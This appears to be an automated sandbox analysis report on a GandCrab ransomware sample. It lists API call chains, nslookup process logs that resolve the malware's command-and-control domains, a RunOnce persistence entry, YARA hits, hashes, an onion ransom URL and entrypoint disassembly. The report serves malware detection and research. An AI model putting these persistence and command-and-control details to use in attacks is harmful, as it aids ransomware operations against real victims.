Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	9_2_0FBC2F50
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	25_2_0FBC2F50

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F1D6A40
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F1D6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	9_2_0FBC6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	9_2_0FBC6A40
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	25_2_0FBC6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	25_2_0FBC6A40

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	API call chain: ExitProcess graph end node	graph_0-1905
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	API call chain: ExitProcess graph end node	graph_0-1716
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	API call chain: ExitProcess graph end node	graph_0-1708
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	API call chain: ExitProcess graph end node	graph_0-1837
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	API call chain: ExitProcess graph end node	graph_0-1693
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	API call chain: ExitProcess graph end node	graph_9-1914
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	API call chain: ExitProcess graph end node	graph_25-1914

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F1D8150

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,

0_2_0F1D5210

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D5EC0 mov eax, dword ptr fs:[00000030h]	0_2_0F1D5EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC5EC0 mov eax, dword ptr fs:[00000030h]	9_2_0FBC5EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC5EC0 mov eax, dword ptr fs:[00000030h]	25_2_0FBC5EC0

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D3AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

0_2_0F1D3AA0

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Code function: 0_2_0F1D90A0 cpuid

0_2_0F1D90A0

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe

0_2_0F1D7330

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	12 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 File and Directory Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	44 System Information Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
O8ZHhytWhn.exe	87%	Virustotal		Browse
O8ZHhytWhn.exe	78%	Metadefender		Browse
O8ZHhytWhn.exe	92%	ReversingLabs	Win32.Ransomware.GandCrab
O8ZHhytWhn.exe	100%	Avira	TR/Dropper.Gen
O8ZHhytWhn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.O8ZHhytWhn.exe.f1d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
9.0.wjaoab.exe.fbc0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.2.wjaoab.exe.fbc0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
9.2.wjaoab.exe.fbc0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.O8ZHhytWhn.exe.f1d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.wjaoab.exe.fbc0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
nomoreransom.coin	2%	Virustotal		Browse
nomoreransom.bit	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b	0%	URL Reputation	safe
https://tox.chat/download.html	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nomoreransom.coin	unknown	unknown	true	2%, Virustotal, Browse	unknown
ipv4bot.whatismyipaddress.com	unknown	unknown	false		high
nomoreransom.bit	unknown	unknown	true	1%, Virustotal, Browse	unknown
gandcrab.bit	unknown	unknown	true		unknown
dns1.soprodns.ru	unknown	unknown	true		unknown
dns2.soprodns.ru	unknown	unknown	true		unknown
8.8.8.8.in-addr.arpa	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.torproject.org/	O8ZHhytWhn.exe, wjaoab.exe.0.dr	false		high
http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b	O8ZHhytWhn.exe, wjaoab.exe.0.dr	true	URL Reputation: safe	unknown
https://tox.chat/download.html	O8ZHhytWhn.exe, wjaoab.exe.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694558
Start date and time:	2022-08-31 23:47:38 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	O8ZHhytWhn.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@89/2@278/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 96%) Quality average: 83.5% Quality standard deviation: 24.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 43 Number of non-executed functions: 123
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:48:46	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"
23:48:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce wzugsdsqebh "C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\eb42b1a5c308fc11edf1ddbdd25c8486_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\O8ZHhytWhn.exe
File Type:	data
Category:	dropped
Size (bytes):	2222
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D450FF4604F32CB5D2F566F10B1FC222
SHA1:	51E30F18F2B90316F51899F09714CFC1B9676948
SHA-256:	1FE51B05C44F6C78BD31E501DF8A4D12D290CAB134663219CF3C713A604FCA35
SHA-512:	7B4BFAF3E1DAEFA0C140E904C67F4136951F3411BD6C8252CEAFF4F7A7B857817B03DEF803CAE00EDA7CD7DD8A1A0EC8415B9564C344FA1253ECCE1C4A5695AD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe

Download File

Process:	C:\Users\user\Desktop\O8ZHhytWhn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	71168
Entropy (8bit):	6.4214958624218355
Encrypted:	false
SSDEEP:	1536:KZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2Lkvd9:8BounVyFHpfMqqDL2/Lkvd
MD5:	A1E6F4D9E1AF5740E07B86A42C6C430B
SHA1:	0463905CBEC8B4BADCFBD2B05B8D6B8C5BE9A56C
SHA-256:	0F9F6928B16927DEB69C5128BF1C72F109C31B7478CE52A5A772FE4A62A7D9C8
SHA-512:	C4D84F7B77F99C02DC8EE82A01902F7B82A63D2E5F7AF33019D854066879FFEC91CBAB264EF04B24A23135721914D22EA863DA6C10D42A0D49BAD6F913F48769
Malicious:	true
Yara Hits:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe, Author: kevoreilly
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This .y.1..m cannot be run in DOS mode....$........Tg..:4..:4..:4..4..:4..4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z.............................K.......................................`............@.............................U...8........@.......................P.......................................................................................text.............................. ..`.rdata...p.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.421564704960313
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	O8ZHhytWhn.exe
File size:	71168
MD5:	b39febf7440b58a6cd15ae9f01916f98
SHA1:	66984e561fc5feead5ef9790f79bffd7778ac1e2
SHA256:	9c689986ca8e0b4fd93657ad9ed5c37994ccf591c90d5fba85684f2d0f49e1b9
SHA512:	3080283a04ddf66d59cf8309fb2fb1720a094fdfd408b74d8483e1e6f8712b236f8b6f62335e8bdab060ef993e4cdf92822c6cd83483a1876450ba0447e90796
SSDEEP:	1536:7ZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2Lkvd9:7BounVyFHpfMqqDL2/Lkvd
TLSH:	1D636A0EA2E1A193E1F357B9FA757E65446E3D203B289BDB099359852D630F0793B303
File Content Preview:	MZ......................@...............................................!..L.!This .j0.#.m cannot be run in DOS mode....$.........Tg..:4..:4..:4...4..:4...4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x10004bf0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH
Time Stamp:	0x5A8C5AD9 [Tue Feb 20 17:28:57 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	6b11af918234585a966ca8fab046dc6c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0Ch
mov dword ptr [ebp-0Ch], 00000001h
mov eax, dword ptr [ebp+0Ch]
mov dword ptr [ebp-08h], eax
cmp dword ptr [ebp-08h], 01h
jmp 00007F732C73A7B6h
jmp 00007F732C73A7DCh
jmp 00007F732C73A7DAh
push 00000000h
push 00000000h
push 00000000h
push 10004950h
push 00000000h
push 00000000h
call dword ptr [1000A108h]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007F732C73A7BCh
mov ecx, dword ptr [ebp-04h]
push ecx
call dword ptr [1000A10Ch]
mov eax, dword ptr [ebp-0Ch]
mov esp, ebp
pop ebp
retn 000Ch
int3
int3
push ebp
mov ebp, esp
sub esp, 5Ch
push esi
push 00000044h
lea eax, dword ptr [ebp-58h]
xorps xmm0, xmm0
push 00000000h
push eax
mov esi, ecx
movdqu dqword ptr [ebp-10h], xmm0
call 00007F732C73EB67h
mov eax, dword ptr [10012A6Ch]
add esp, 0Ch
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-1Ch], eax
mov eax, dword ptr [10012A68h]
or dword ptr [ebp-2Ch], 00000101h
mov dword ptr [ebp-20h], eax
xor eax, eax
mov word ptr [ebp-28h], ax
lea eax, dword ptr [ebp-10h]
push eax
lea eax, dword ptr [ebp-58h]
mov dword ptr [ebp-58h], 00000044h
push eax
push 00000000h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
push 00000000h
push esi
push 00000000h
call dword ptr [1000A164h]
test eax, eax
jne 00007F732C73A7BDh
call dword ptr [1000A064h]
pop esi
mov esp, ebp
pop ebp
ret
push dword ptr [ebp-10h]

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[EXP] VS2013 build 21005
[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x104e0	0x55	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10538	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xac4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
